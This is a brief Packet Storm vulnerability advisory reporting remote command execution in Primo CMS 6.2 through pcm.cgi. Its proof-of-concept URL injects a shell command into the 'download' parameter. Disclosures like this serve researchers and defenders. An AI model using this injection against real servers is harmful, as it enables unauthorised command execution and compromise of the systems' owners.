Primo CMS 6.2 Remote Command Execution

2014-03-31T00:00:00
ID PACKETSTORM:125954
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2014-03-31T00:00:00

Description

                                        
                                            `[+] Remote Comand Execution on Primo Content Management (cms)  
[+] Date: 29/03/2014  
[+] Risk: High  
[+] Author: Felipe Andrian Peixoto  
[+] Contact: felipe_andrian@hotmail.com  
[+] Vendor Homepage: http://www.primo-corp.com.my/  
[+] Tested on Windows 7 and Linux  
[+] Vulnerable File: pcm.cgi  
[+] Version : Version 6.2  
[+] Exploit: http://host/cgi-bin/pcm.cgi?download=;id|  
`